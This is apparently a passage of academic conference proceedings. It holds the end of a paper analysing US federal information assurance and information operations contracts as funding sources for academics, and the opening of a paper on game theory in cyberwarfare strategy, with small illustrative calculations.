scholar. Therefore, this paper reviews the types of research areas that have experienced the most<br />
growth, as well as areas that will experience future growth. We identify the DoD and Federal<br />
contractors that have the best success in obtaining contracts in the IA and IO areas. We give<br />
extensive details of the global and United States Government (USG) environment, which drive the<br />
security business as well. The authors also discuss how the USG and interagency interactions<br />
influence contracting policies and awards. Understanding all of the foregoing factors and strategies will<br />
allow the academic researcher to formulate targeted business plans to employ in their search for<br />
additional funding.<br />
2. IA and IO business growth areas – players, relationships and influences<br />
The Federal IA segment is characterized by agency management that is policy, doctrine and<br />
reputation motivated.<br />
Civilian agencies' IT security directives are driven by the magnitude, not the quantity, of events.<br />
Overriding political priorities work against new government-wide IT security legislation. Trade-offs of<br />
efficiency and effectiveness against security and privacy differ by department.<br />
Agency Corporate Information Security Officers struggle with choosing to simply use a<br />
compliance scorecard or going farther to secure their enterprise. It is easier to say you are<br />
compliant than to prove you are secure. Both are necessary to deliver cost effective solutions.<br />
Department level initiatives drive security agendas. Each USG department has separate<br />
initiatives, which in turn drive their emphasis or lack of emphasis on IA.<br />
Security focus has followed the path of perimeter security, then data security, and most<br />
recently coding security. This end-to-end focus on secure design, development and<br />
implementation is becoming common in all market segments.<br />
The Information Systems Security Line of Business is not expected to cannibalize short-term vendor<br />
sales.<br />
Demand for Integrated Security Services is growing. Standalone (Point) security opportunities are<br />
on the decline.<br />
Federal agencies still separate IT and physical services. Merger of IT and physical security is<br />
impeded by silos of excellence. Successful contract teams will be able to assist in integrating total<br />
security services.<br />
The Commercial IA segment of the security industry is characterized by an upper management that is<br />
litigation and profit motivated. Major trends are similar to the Federal segment. Secondly, there is a<br />
very rapid consolidation of best industry players. Cyber security firms are motivated to rapidly develop<br />
and offer full suites of integrated and managed services to meet the demand for full services. Large IT<br />
and network organizations can successfully merge with smaller IA firms if the ingenuity of the “pure-play”<br />
or point (individual security component supplier) IA firm is not lost. This is a particularly<br />
advantageous route to speed up the number and scope of offerings and to acquire experienced IA<br />
and Information Security (InfoSec) personnel who are in short supply. It is reasonable to expect<br />
similar motivation and actions in the Federal IA market for the same reasons. Thirdly, there are<br />
external factors, including a continuing rise in cybercrime, which follows the earlier increase in<br />
terrorism. Significant increases (greater than 200%) in cybercrime occurred over the last two years.<br />
Over 100 million data records have been lost or stolen. The average cost of each data record loss is<br />
about $180 per record, giving a total estimated loss of $18 billion over the two-year period: high<br />
motivation to client and criminal alike. There is also a modest trend toward offering cyber and physical<br />
security in packages of offerings.<br />
Agencies and firms increasingly outsource more security activities each year. They determine that<br />
they can achieve cost savings or a higher level of security at the same cost and tend to increase their<br />
outsourcing budgets over time. The firms that do outsource all or part of their IT security activities will<br />
see an increase in their level of security per dollar of investment. Surprisingly, although they don’t<br />
realize it, agencies and firms that outsource Security Services are also likely to benefit from each<br />
other’s decisions to outsource. IT security outsourcing has been shown to result in a reduction in the<br />
firm’s production costs and a freeing up of other resources. (Outsourcing refers to the relationship<br />
between a firm and another firm it pays to conduct security activities on its behalf.) However, without<br />
careful planning and due diligence, the client’s return on investment in outsourcing IT security could be<br />
reduced or become negative as a result of a variety of potential costs, including strategic risks<br />
(e.g., principal-agent problems), interoperability issues and other transaction costs.<br />
There are several emerging areas involving the “social” and risk management aspects of IA/IO.<br />
Clearly, “social” is used here to mean relationships among groups of agents, whether individuals or<br />
organizations, that involve proprietary information. At the firm level, there is a need to assure individual<br />
firms that their partners, suppliers, or any organization they communicate with over the Internet are<br />
trustworthy to a defined level acceptable to upper management. The economic benefit of securing all<br />
members of the business group is significant. At the individual level there is growing demand to<br />
secure interpersonal communications involving proprietary information (marketing, strategy and<br />
planning, budgets or financial), email, data and image exchanges, instant messaging, etc. This is also<br />
an area of vital national interest to DoD and other Federal agencies.<br />
In addition, the global environment influencing customers as well as the Federal and Commercial IA<br />
segments is characterized by significant stress. Negative pressure from the environment that Federal<br />
and Commercial organizations must perform under has increased significantly since 2007. The United<br />
States government (USG) and the global international community, nation states, state-sponsored<br />
nongovernment organizations (NGOs), organizations, groups, and individuals have rapidly moved into<br />
a new and more unstable situation. The Diplomatic, Intelligence, Military, Economic, Cultural/Social<br />
and Environmental factors (including medical, earthquake, fire, wind, flood, etc.) [DIMES-E] are<br />
considerably more powerful. That transition from a relatively steady state into an economically harsh<br />
state is bad enough. A new, transient and poorly understood unsteady state makes prediction of<br />
expected local and global situations uncertain and thus even more stressful. Together, the DIMES-E<br />
factors above mean three things for the future:<br />
Bad actors can be expected to act even worse and previously good actors may act badly<br />
Predicting the actor’s actions and timing will be too complex and uncertain to analyze in<br />
adequate, precise and satisfactory detail<br />
Better analysis and planning for steadily moving to a more stable and less uncertain future is of<br />
paramount importance.<br />
Consistent with this global situation, a shift towards IA and Cyber security is evident in the contracts<br />
data. Defending and assuring one’s data, information and knowledge is the first basic step toward<br />
managing both the DIMES-E transitions and the bad actors that the social stress of a rapid<br />
transition brings out.<br />
IO, IW and IA are sometimes also grouped as the network and information components of “Cyber War”<br />
(Carr, 2009). Like IO and IA, Cyber War is a term that includes threats from:<br />
Cyber Attacks,<br />
Cyber Crime,<br />
Cyber Espionage,<br />
Informatized War,<br />
Information War, and<br />
Computer Network Operations<br />
Defending against these threats can potentially save billions of dollars to the USG, business and<br />
international organizations and thus serve to greatly reduce the stresses forcing the three dire<br />
expectations above. The bad actors involved are State, State-sponsored, and Non-State actors who<br />
use the Internet to attack and disrupt both military and civilian organizations. These actors commit<br />
acts of espionage against Department of Defense and DoD contractor networks, accelerating<br />
other nation states’ race to achieve parity or near-parity with superior U.S. military technology. They<br />
commit acts of network intrusion into U.S. critical infrastructure, remaining dormant until needed to<br />
delay or stop an imminent U.S. military action against an adversary state. They further commit<br />
espionage against U.S. corporations, stealing millions in intellectual property. They also disrupt<br />
national economies and rob banks on an unprecedented scale.<br />
3. Analysis of IO, IW, IA and cyber contracts<br />
As part of this research, the authors conducted a series of searches on a commercial Federal and<br />
DoD business database known as INPUT (INPUT, 2010), http://www.input.com. This tool is useful in<br />
that it stores all opportunities (past, present and future) in archival form, and one can search in both a<br />
functional manner (using multiple keywords) and an organizational one (across the federal<br />
government). In total, for this paper, searches for types of contracts were made using 13 key words. A<br />
general search on all keywords and separate searches on each individual keyword were run.<br />
Keywords included:<br />
Information Operations (IO)<br />
Information Warfare (IW)<br />
Information Assurance (IA)<br />
Perception Management<br />
Strategic Communications<br />
Psychological Operations (PSYOPS)<br />
Public Diplomacy<br />
Electronic Warfare (EW)<br />
Deception<br />
Operations Security (OPSEC)<br />
Cyber Security<br />
Cyber Operations<br />
Cyber Warfare<br />
In addition, five different contract status categories were reviewed to include the following:<br />
Forecast Pre-RFP (Forecast Pre-Request for Proposal)<br />
Pre-RFP<br />
Post-RFP<br />
Source Selection<br />
Award (contract awarded)<br />
The data was pulled twice at a 12-month period – first in September 2009 and then again in<br />
September 2010, as shown in Tables 1 and 2. These numbers represent the contracts in the INPUT<br />
database either in process (in one of the pre-award states) or already awarded as of the date given in<br />
the table heading.<br />
Table 1: Status of all contracts by contract category as of September 2009<br />
September 2009 Forecast Pre-RFP Post-RFP Source Selection Award Total<br />
Information Operations 58 35 11 15 216 335<br />
Information Warfare 15 16 3 7 100 141<br />
Information Assurance 79 143 22 45 399 688<br />
Perception Management 2 2<br />
Strategic Communications 15 19 1 2 48 85<br />
Psychological Operations 6 2 3 3 37 51<br />
Public Diplomacy 2 1 12 15<br />
Electronic Warfare 52 58 22 39 333 504<br />
Deception 5 7 6 7 46 71<br />
Operations Security 12 4 2 10 48 76<br />
Cyber Security 10 13 1 1 43 68<br />
Cyber Operations 2 2 5 9<br />
Cyber Warfare 1 2 2 5<br />
Total 254 300 75 130 1291 2050<br />
Table 2: Status of all contracts by contract type as of September 2010<br />
September 2010 Forecast Pre-RFP Post-RFP Source Selection Award Total<br />
Information Operations 16 15 3 6 76 116<br />
Information Warfare 4 5 1 5 41 56<br />
Information Assurance 46 70 7 30 290 443<br />
Perception Management 1 1<br />
Strategic Communications 15 10 1 5 61 92<br />
Psychological Operations 8 4 2 3 41 58<br />
Public Diplomacy 3 13 16<br />
Electronic Warfare 13 12 8 9 138 180<br />
Deception 5 7 5 6 56 79<br />
Operations Security 8 13 4 6 62 93<br />
Cyber Security 11 15 3 4 53 86<br />
Cyber Operations 1 1 11 13<br />
Cyber Warfare 1 3 3 5 12<br />
Total 131 151 38 77 848 1245<br />
From the 2010 set of data, we sorted by company name and counted the number of contracts in the<br />
award state (awarded) to each company. Table 3 shows that only 29 of 341 companies won more<br />
than two awards, and only eight companies won 10 or more awards in the data reviewed in this<br />
research.<br />
Table 3: Frequency of awarded number of contracts as of September 2010<br />
Awards 1 2 3 4 5 6 8 ≥ 10<br />
# of Companies 242 49 7 7 4 2 1 8<br />
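The tallies behind Table 3 amount to a simple two-level frequency count: awards per company, then companies per award count. The sketch below uses invented placeholder company names, not actual INPUT records:

```python
from collections import Counter

# Invented placeholder award records (one entry per contract award):
awards = ["AcmeCorp", "AcmeCorp", "BetaSys", "AcmeCorp", "BetaSys", "GammaLLC"]

per_company = Counter(awards)              # contracts won by each company
frequency = Counter(per_company.values())  # how many companies won n awards

print(per_company)  # Counter({'AcmeCorp': 3, 'BetaSys': 2, 'GammaLLC': 1})
print(frequency)    # one company each with 3, 2 and 1 awards
```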
Success of the awardees could be measured in several ways: total number of contracts awarded, total<br />
dollar value of contracts awarded, award dollars per employee, etc. We use a simple measure important<br />
to academic researchers, the total number of contracts, since it is a straightforward measure of their<br />
best sources of opportunities. Using the data on awarded contracts from the INPUT database, we<br />
found that the eight corporations that won 10 or more IO contracts in Table 3 were the following:<br />
Northrop Grumman Corporation 41<br />
Science Applications International Corporation (SAIC) 40<br />
General Dynamics Corporation 20<br />
BAE Systems PLC 19<br />
Lockheed Martin Corporation 19<br />
Booz Allen Hamilton 15<br />
CACI International Inc 15<br />
L-3 Communications Inc 10<br />
This information shows that as IA and IO have matured in the Federal and DoD marketplace, the<br />
competition appears to be centering more and more on the same key players. Knowing the players<br />
who have won the most contracts suggests strategies for entering the fray.<br />
4. Strategies for entering the fray<br />
The academic researcher must deliver at least best practice and, more importantly, unique or world-class<br />
theories, models, products or services to the contract team in order to be successful. This<br />
applies to individual contributions as well as for the products and services they are developing. After<br />
satisfying these basic requirements for success, there are several key strategies for entering the fray<br />
and selecting which aspect of IO, IW or Cyber to work on. The key strategies laid out in our previous<br />
paper in 2007 centered on the following:<br />
Allying Oneself with the Leading Contenders<br />
Developing a Front Runner<br />
Striking out on your Own<br />
In light of the updated contract information and the current international situation, in the authors’<br />
opinion, the new key strategies are as follows:<br />
Develop strong relationships with key individuals of those corporations that are consistently<br />
winning IO and IW contracts<br />
Focus on IO/IW areas that have the most contracts (IA and Cyber Security)<br />
Stay aligned with growing areas of interest in the community (e.g. Strategic Communications)<br />
4.1 Developing strong relationships<br />
The eight companies listed earlier have won about 25% of the total IO and IW contracts from our<br />
research data, and there is a good reason for that. IO and IW, like any endeavor, require a certain<br />
amount of expertise in the form of personnel, capabilities and past performance. Government<br />
contracting officers and their technical representatives are, in general, conservative and will often go<br />
with the “tried and true” company that has performed these duties in the past. A good example is<br />
Northrop Grumman, which ran the IO Center of Excellence for the Army at Ft. Belvoir for an extended<br />
period and was recently also awarded the contract to run the IO Center for the US Marine Corps.<br />
Clearly, a strong relationship with a company which wins numerous contracts offers more<br />
opportunities for teaming on those contracts.<br />
<strong>Academic</strong>s, like the contracting company, should plan to review and update their strategies at least<br />
once a year, and must be ready to adapt to changes in the acquisition requirements (FAR), market<br />
dynamics and technological innovations. The academic can thus align their contributions to the<br />
company’s contracted requirements. The academic team member can assist the company in<br />
establishing and enhancing service offerings, building corporate values, establishing infrastructure to<br />
support corporate vision, and providing synergy by leveraging corporate resource bases.<br />
4.2 Focus on IA and cyber security<br />
Out of all of the areas of IO and IW, it is IA and computer security that hold the most promise and<br />
potential and, by our research, the reality of income for academic research. Every business and<br />
military organization needs protection for their computer systems. We see a serious present need to<br />
fix a significant Defensive shortfall in the US cyber position, particularly the commercial and civilian<br />
infrastructure areas. Armistead and Clarke (Armistead, 2010; Clarke & Knake, 2010) emphasize the<br />
central and crucial importance of improving Defensive Cyber capability, and of having open debate on<br />
Cyber strategy/planning/policy – similar to the process carried out for nuclear weapons when that<br />
technology emerged 50 years ago.<br />
4.3 Watch Strategic Communications<br />
Strategic Communications (SC) is an area of continuing interest in the USG, in particular to the DoS<br />
and DoD (Armistead L., 2010). SC should also be watched as a candidate for future contract growth.<br />
SC is important because it addresses a much broader, more informed view of the very demanding<br />
DIMES-E world situation the USG faces today. Because the academic community will find a number<br />
of areas in SC to which they can contribute, we include the following background details. As<br />
discussed in our previous paper (Armistead & Murphy, 2007) and by Paul (Paul, 2010), Strategic<br />
Communications refers to five areas with differing but related meanings:<br />
Enterprise level strategic communication<br />
Strategic communication planning, integration, and synchronization processes<br />
Communication strategies and themes<br />
Communication, information, and influence capabilities<br />
Knowledge of human dynamics and analysis or assessment capabilities.<br />
Paul points out that “these five specifications connect to each other logically. Within the broader<br />
strategic communication enterprise, national or campaign level goals and objectives constitute the<br />
inputs to the strategic communication planning, integration, and synchronization processes. Based on<br />
knowledge of human dynamics and analysis or assessment capabilities, these processes transform<br />
and incorporate the communication strategies and themes and provide them to commanders who<br />
employ the various available communication, information, and influence capabilities in pursuit of<br />
desired objectives. The planning, integration, and synchronization processes and knowledge,<br />
analysis, and assessment capabilities continue to be useful to force elements as they broadcast or<br />
disseminate their themes and messages or otherwise engage and appraise the impact of these<br />
activities”. The reader is referred to (Paul, 2010) for details of the following SC elements.<br />
Enterprise level strategic communication is a commonly shared but general understanding of SC;<br />
it refers to a broad range of USG enterprise level activities and their coordination for internal,<br />
national, international or global strategic goals. Enterprise level strategic communication is<br />
therefore too broad to be very meaningful.<br />
Strategic communication planning, integration, and synchronization processes are the set of<br />
processes included under the overly general USG enterprise level use of “Strategic<br />
communication”.<br />
“Communication strategies and themes are strategic communication elements that involve<br />
content and both the inputs and outputs from the strategic communication planning, integration,<br />
and synchronization processes”. This includes national or campaign goals or objectives (inputs)<br />
that planning processes will translate into communication goals and themes (outputs) and<br />
incorporate into plans. However, there is a multilevel application of these elements. The focus on<br />
these elements of strategic communication can be on levels at, above or below the USG<br />
enterprise level. They could involve higher-level international strategic goals and the implied<br />
communication. Alternatively, they could consider objectives and themes in lower level<br />
operational organizations to be coordinated with and communicated by various communication,<br />
information, and influence assets.<br />
Communication, information, and influence capabilities are broadcast, dissemination, and<br />
engagement elements of SC. Communication, information, and influence capabilities include<br />
public affairs, perception management, psychological operations (PSYOP now MISO), defense<br />
support to public diplomacy (DoD to DoS), and civil affairs. These capabilities are thus very broad.<br />
They can be combined with elements of force, such as maneuver conducting civil-military<br />
operations or military police. They might include the interactions of any element of the USG<br />
military, diplomatic or other forces with foreign populations or the prevalence of language and<br />
cultural awareness training across the force. They might include any action or comment by every<br />
deployed diplomatic or military service member.<br />
Knowledge of human dynamics and analysis or assessment capabilities are the fundamental<br />
bases for all the preceding specified activities. In contrast to processes, knowledge, analysis and<br />
assessment are the bases of accurate models for planning effective, efficient, and successful<br />
actions. Knowledge is obtained via media monitoring, media use pattern research, target<br />
audience analysis, and social, historical, cultural, and language expertise, along with other<br />
relevant analytic and assessment capabilities. “Cultural knowledge and audience analysis are<br />
critical for translating broad strategic goals into information and influence goals. Understanding<br />
audiences specifically and human dynamics generally is critical to identifying themes, messages,<br />
and engagement approaches that will lead to desired outcomes. Data collection and assessment<br />
contribute the feedback that allows two-way communication and engagement (rather than just<br />
broadcast) and that also makes it possible to demonstrate and report impact or effect from<br />
communication activities.” (Paul, 2010)<br />
Thus, the academic researcher could contribute SC applications of Business Marketing, Psychology,<br />
Narratives, Political Science, Economics, and many other disciplines.<br />
5. Future areas of research<br />
Several assumptions must be made when determining IA/IO needs over the next five years. The first<br />
is that the U.S. economy will continue to rebound from the great recession. The second is that the<br />
U.S. will fund continuing IA efforts in the Federal budget. The third assumption is that information<br />
operations will continue to be a growth market, hence the continuing need to bolster IA needs,<br />
requirements and solutions. Continued introduction of unique discriminating Security offerings, such<br />
as an integrated set of IO services, will be vital to keeping revenue up in the contracted companies. IA<br />
services price elasticity is based on the demand from the customer base and costs for having<br />
qualified, trained and certified personnel. These personnel allow the contract team to reach critical<br />
mass in Knowledge Management, create a good reputation, and build consistent security teams to<br />
provide IA functions to customers. Given these assumptions, we expect that the customer base will remain<br />
large and that their IA needs and requirements, as well as their budgets, will continue to grow. Acquiring and<br />
maintaining personnel to support IA/IO contract teams will continue to be a challenge to employers<br />
and an opportunity for academics.<br />
How will current capabilities and technologies develop and evolve over the next five years? We can<br />
expect the introduction of a host of new technologies presenting opportunities for IT security vendors.<br />
Many of these will be wireless devices, particularly nomadic devices for home and business users.<br />
The expectation is a continued blending of technologies, such as is just beginning to<br />
occur in Internet and cable TV technologies. Increasingly, users of computing devices will have<br />
access to a combination of web-based technologies, including traditional HTTP/IP communications,<br />
streaming video, voice over IP (VOIP), global positioning systems and database applications. Users<br />
will be able to seamlessly move between these technologies via increasingly sophisticated user<br />
interfaces and input/output devices. The blending of technologies, along with increased use of<br />
service-oriented architecture (SOA), will increase the need for multi-level and cross-domain security<br />
capabilities. Cross-domain security requirements will increase significantly, as the ability to share data<br />
across SOAs will increase the need for securing privacy and classified data extracted from databases<br />
for use in other applications. Likewise, the DoD trend towards employing SOAs to support net-centric<br />
operations will make certification and accreditation (C&A) increasingly difficult. Biometric identification and access control<br />
technologies will be a growth industry, particularly in the area of identity verification technologies for<br />
use by home PC users in eCommerce. Identity theft protection needs will continue to increase, as<br />
criminals develop increasingly sophisticated means of stealing electronic identity data. The need for<br />
technologies to detect spoofing in emails and on websites will continue to grow. Finally, the capability<br />
to perform software verification and validation (V&V) to determine the inherent security of software<br />
code will become an area of increasing significance.<br />
We argued in the Strategies to Entering the Fray section, based on our analysis of current and<br />
expected contracts, that IA and Cyber Defense will receive increasing attention. Armistead and Clarke<br />
(Armistead, 2010; Clarke & Knake, 2010) also emphasize the central and crucial importance of<br />
improving Defensive Cyber capability, and of having open debate on Cyber strategy/planning/policy –<br />
similar to the process carried out for nuclear weapons when that technology emerged 50 years ago.<br />
We appreciate the need for coverage and analysis of Defensive and Offensive Cyber strategy,<br />
operations and tactics. More importantly, we also see a serious need to fix a significant Defensive<br />
shortfall in the US cyber position. Because there is no agency with responsibility for Defense of<br />
civilian banking, commercial, industrial systems, and because the DoD and the USG partially depend<br />
on the commercial internet, a monumental vulnerability exists. Engaging in conflicts with a good<br />
offense but without a good defense will fail. The nation as a whole now finds itself in that situation.<br />
These factors provide additional reasons why the authors adopted the current Defensive focus in our<br />
Strategies for Entering the Fray section. Both Armistead and Clarke (Armistead L., 2010; Clarke &<br />
Knake, 2010) outline a process to establish a well-founded strategy-policy-plan and minimize risk of<br />
uncontrolled Cyber-Kinetic War. These analyses suggest several topics, simulations and desktop<br />
exercises, which would be useful to USG contract work. A well-founded analysis must address our<br />
overall Strategy and Political situation, with military and cyber strategy as a component of national<br />
strategy.<br />
A difficult area needing both theoretical and practical development is formulating Measures of<br />
Performance [MOP] and Measures of Effectiveness [MOE] (Tokar, 2010). This is a focus area of military<br />
effects based (EB) planning. Roughly, when carrying out missions involving the application of<br />
components of IO, IW, Cyber, etc., we need to measure whether we are “doing the right things” to effectively<br />
achieve our desired goals [MOE] and whether we are efficiently “doing things right” [MOP] so as not to waste time,<br />
money, equipment and people. A related concept in the business world, which will be of increasing<br />
importance as USG and DoD budgets narrow, is Return on Security Investment [ROSI]. The difficulty<br />
with these ideas is in measuring the impact of one component alone when multiple different initiatives<br />
are brought to bear. How one separates the effects of one from the combination of all is directly<br />
related to the model of the complex DIMES-E processes being used.<br />
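The ROSI idea can be made concrete with a minimal sketch. The formulation below is a common one from the security-economics literature, not a model proposed in this paper, and all of the figures are hypothetical:

```python
# A minimal ROSI sketch (a common security-economics formulation, not a
# model from this paper). All figures are hypothetical.

def ale(incidents_per_year, loss_per_incident):
    """Annualized Loss Expectancy: expected yearly loss from a threat."""
    return incidents_per_year * loss_per_incident

def rosi(ale_before, ale_after, control_cost):
    """ROSI = (loss avoided - cost of the control) / cost of the control."""
    return (ale_before - ale_after - control_cost) / control_cost

before = ale(incidents_per_year=4, loss_per_incident=50_000)  # $200k/yr exposure
after = ale(incidents_per_year=1, loss_per_incident=50_000)   # $50k/yr exposure
print(rosi(before, after, control_cost=60_000))  # 1.5, i.e. a 150% return
```

The hard part identified above, attributing the reduction in loss expectancy to one initiative among many, is precisely the input this formula takes for granted.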
Finally, the need for new and improved models of complex, DIMES-E systems is the most<br />
fundamental barrier to achieving success, performance and efficiency. The benefits from such<br />
insightful theory and models will be similar to the leap forward in physical sciences resulting from<br />
Newton’s or Kepler’s Laws. If we are to more simply and accurately understand, predict and act to<br />
bring about a desired future, and if we are to be able to tease out the effects of one factor (e.g. SC,<br />
MISO, etc.) from the effects of many, then we must discover and apply much more insightful theories<br />
and mathematical models to DIMES-E systems. Such models can clarify the attribution of who and<br />
what is really at work and how to anticipate and adjust to the situation. This will allow everyone,<br />
leaders and members of governments and organizations alike, to move beyond simply knowing they<br />
are in serious hardship or risk, to appreciate what is being done right and what is not, and act to bring<br />
about a more desirable future rather than an expected undesirable future.<br />
6. Summary<br />
Our overall goal has been to provide both the sources of funding opportunity for academic<br />
researchers as well as sufficient background to understand the strategies for acquiring funding from<br />
those sources. We first described the intuition and insight into the motivation of players, relationships<br />
and integrated influences in the IA and IO business growth areas. In particular, we noted the<br />
important influence of stress from external conditions and global DIMES-E situations. The ability to<br />
understand and address these integrated problem areas is fundamental to an academic’s funding<br />
success. Based on an analysis of contracts up to September 2010, we noted a current focus on IA<br />
and Cyber security. We concluded that IA and Cyber Security are areas that should and will continue<br />
to receive contract funding. Next, we further analyzed current and historical IO, IW, IA and Cyber<br />
contracts and identified which companies have been awarded more contracts to date and are thus<br />
“opportunity targets” for academic consulting. We provided details of strategies to enter the contract<br />
fray, suggesting that understanding the contract and the contractor and developing strong relationships<br />
with contractors are essential. We gave substantial details on how and why one develops strong<br />
relationships. We called attention to the area of Strategic Communications as a possible future area of<br />
opportunity, given the broader scope of integration and application of security contract focus. Finally,<br />
we mentioned several future areas of research, giving the assumptions made as well as details of<br />
selected difficult but very important technical, complex predictive modeling and MOE/MOP areas that<br />
need to be solved.<br />
References<br />
Armistead, E., & Murphy, T. (2007). The Evolution of Information Assurance and Information Operations<br />
Contracts across the DoD: Growth Opportunities for <strong>Academic</strong> Research. ICIW <strong>Conference</strong>. Monterey, CA.<br />
Armistead, L. (2010). Information Operations Matters - Best Practices. Washington, D.C.: Potomac Books, Inc.<br />
Carr, J. (2009). Inside Cyber Warfare. O'Reilly.<br />
Clarke, R. A., & Knake, R. K. (2010). Cyber War - The Next Threat to National Security and What to do About It.<br />
New York, NY: HarperCollins.<br />
INPUT. (2010). INPUT Database: “The Authority on Government Business”. Retrieved 2010, from<br />
http://www.input.com<br />
Paul, C. (2010). “Strategic Communication” Is Vague, Say What You Mean. Joint Forces Quarterly, Issue 56.<br />
Tokar, J. (2010). Assessing Operations: MOP and MOE Development. IO Journal, Vol. 2, Issue 3, 25-28.<br />
The Uses and Limits of Game Theory in Conceptualizing<br />
Cyberwarfare<br />
Merritt Baer<br />
Harvard Law School, Cambridge, USA<br />
mbaer@post.harvard.edu<br />
Abstract: In cyberwarfare, there are obstacles to reaching minimax stasis: unlike in checkers, game theory<br />
cannot follow each decision path to its conclusion and then trace the right decisions back. However, I contend<br />
that because the rational predictability of game theory will continue to drive decisions and seek out patterns in<br />
them, game theory may identify (and intelligently weight) nodes of a decision tree that are not immediately<br />
recognizable to or favored by human decision-makers. While we can't create a network that is maximally<br />
resistant to random faults and maximally resistant to targeted faults, we can take into account the particular<br />
weaknesses and likelihoods of attack so that the weaknesses overlap in resistant ways-- ways that correspond to<br />
risk preferences and security priorities. Moreover, using game theory to make a security strategy that is a<br />
calculated derivative of mapped potential outcomes will help us to avoid human biases and to respond to threats<br />
proportionately/economically. Rather than a process of continual growth, cyber evolution, like biological evolution,<br />
seems more aptly characterized as punctuated equilibrium—periods of relative stasis followed by quick, drastic<br />
periods of breakthrough. Reaching Nash equilibrium is unlikely in the cyberwar context because under unstable<br />
conditions, evolutionarily stable strategies don't run a typical course. While there may be no set of moves that is a<br />
“solution” in cyberwar strategy, game theory allows human decisionmakers to intelligently identify and weight<br />
decision paths to transcend cognitive biases. This paper seeks to change the way of thinking about cyberwar--<br />
from one of stockpiling weapons, to one of looking for patterns-- thinking about the problem of cyber insecurity<br />
more holistically. The paper challenges some of the myopia in thinking about cyber in existing "warfare" terms<br />
and proposes that organic models' tendency toward game theoretic equilibrium may help us conceive of the<br />
cyberwar decisionmaking landscape more effectively.<br />
Keywords: cyberwarfare, game theory, layered defense, Nash equilibrium<br />
1. Introduction<br />
In this paper I explore the applications and limitations of game theory to cyberwarfare at a conceptual,<br />
not case study, level. My focus is on federal strategy—especially the United States Department of<br />
Defense (DoD)—so I do not focus on addressing cybercrime or cyberattack that has as its purpose<br />
money or a local, ideological message, or even those with cyber-terrorist or cyber-anarchist goals. My<br />
focus is on large-scale acts of war aimed at military, governmental or infrastructural targets that<br />
currently only certain nation-states are likely to be able to execute, thus the other “players” in the<br />
game are nation-state-level actors.<br />
I recognize that cyberwarfare is among the rarer forms of online violence in comparison with other<br />
forms of cybercrime, but its high stakes and opportunities for more contained strategic study attracted<br />
my focus. For the purposes of this paper, I assume we have available all existing sophisticated game<br />
theoreticians, human or computerized.<br />
I find that game theory is useful to the extent that it allows us to transcend some of our system-specific<br />
biases (based on established or institutional ways of approaching problems) and threat-specific<br />
biases (rooted in evolutionarily-derived disproportionate reactions to certain threats). Game<br />
theory can allow us to weigh the nodes of the decision tree more accurately; it is not a solution as<br />
such, but a tool for holistic cyberwarfare strategy.<br />
2. Background: Nash equilibrium and complications to game-theoretical<br />
stasis in the cyber context<br />
Game theory scholars have written, though not extensively, on the application of game theory to<br />
information warfare. (See, e.g., Hamilton et al, “The Role of Game Theory in Information Warfare” and<br />
“Challenges to Applying Game Theory to Information Warfare”). The US Cyber Consequences Unit<br />
(US-CCU) claims it primarily employs an analytic method called “Value Creation Analysis” that<br />
“draws…broadly on cooperative game theory.” (See the US-CCU website, http://www.usccu.us/).<br />
Two-player stochastic games may be useful in the escalation context (deciding whether to launch a<br />
preemptive attack or how to respond to an attack could be a two-player interaction). A study published by SPIE has<br />
refined the metrics for estimating impact and intent of cyberattack, and applies Markov game theory, a<br />
stochastic approach (Shen et al. 2007). However, the two-player stochastic model is not valid whenever<br />
more than two players are involved, and this is the more likely scenario— as in the case of a<br />
generalized security model that would account for more than one player as a potential threat, or a<br />
model that includes potential alliances.<br />
The minimax solution in zero-sum games is Nash equilibrium (where each player is at her optimal<br />
level, taking into account the other players' strategy). There exists “at least one Nash equilibrium,<br />
possibly involving mixed strategies, for any normal-form static game with a finite number of players<br />
and strategies” (Jamakka, 2005:14). However, in cyberwarfare, there are obstacles to reaching<br />
minimax stasis: there is no assumption that it is a zero-sum game (power may exist relative to others<br />
but in cyber there can be emerging forms of power and there may be no clear endpoint that signifies<br />
“winning”); there may be more than two players; players may make simultaneous and overlapping<br />
moves (instead of taking turns like in chess); and there is no valid assumption of perfect information<br />
(one's minimax strategy may depend on knowing the capabilities of the other players).<br />
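In the simplest case where these obstacles are absent (two players, zero-sum, a 2x2 normal form with no pure-strategy saddle point), the minimax/Nash solution can be computed directly from the indifference condition. A sketch, using matching pennies as the worked example (the game choice is ours, not the paper's):

```python
# Mixed-strategy Nash equilibrium of a 2x2 zero-sum game via the
# indifference condition. Assumes no pure-strategy saddle point exists.
# Payoffs [[a, b], [c, d]] are to the row player; the column player
# receives the negation.

def solve_2x2_zero_sum(a, b, c, d):
    """Return (p, q, v): the row player mixes rows with probabilities
    (p, 1-p), the column player mixes columns with (q, 1-q), and v is
    the value of the game."""
    denom = a - b - c + d
    p = (d - c) / denom      # makes the row player's payoff equal across columns
    q = (d - b) / denom      # makes the column player's loss equal across rows
    v = a * p + c * (1 - p)  # expected payoff against column 1
    return p, q, v

# Matching pennies: no saddle point, unique mixed equilibrium at 50/50.
print(solve_2x2_zero_sum(1, -1, -1, 1))  # (0.5, 0.5, 0.0)
```

Each obstacle listed in the paragraph above (more than two players, simultaneous overlapping moves, imperfect information) removes one of the assumptions this closed form depends on.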
Moreover, the possibility of alliances disrupts Nash equilibrium because if players can agree on<br />
strategies different from minimax, they may achieve higher payouts. The classic example of this is a<br />
cartel manipulating the market; in the cyber realm, it could take the form of international or even<br />
non-nation-state collaboration among players. U.S. vulnerability to alliance-making by other players is<br />
accentuated by the fact that we have more to lose— our government and our private-sector cyber<br />
capabilities/data are overall more valuable than other countries' (Hathaway, 2009:16).<br />
Some, including former Department of Homeland Security Secretary Michael Chertoff (in Espiner<br />
2010), compare nuclear strategy to cyber strategy. However, cyber weapons defy nuclear game<br />
theoretic strategy because cyber weapons are amorphous and can be pinpointed— used as a scalpel<br />
instead of, or as well as, a hammer. Even cyber weapons that are clearly war-oriented, like Stuxnet,<br />
can be more controlled and monitored in use than nuclear weapons, may take time to detect and may<br />
cover the executor's tracks. Unlike the nuclear arena, in which even those with capabilities have so far<br />
resisted employing nuclear weapons, cyberwar weapons have been and will continue to actually<br />
come into use—but in nuanced and creative ways that elude traditional definitions of use of force,<br />
weapons, or war.<br />
For all these reasons, it seems likely that we cannot use game theory in the traditional method of<br />
modeling the game's endpoints and then reversing the moves that would lead to stasis, because we<br />
may never reach equilibrium. This is another way of saying that the game may have multiple Nash<br />
equilibria-- “Game theory cannot necessarily predict the outcome of a game if there are more than<br />
one Nash equilibriums [sic] for the game. Especially when a game has multiple Nash equilibriums [sic]<br />
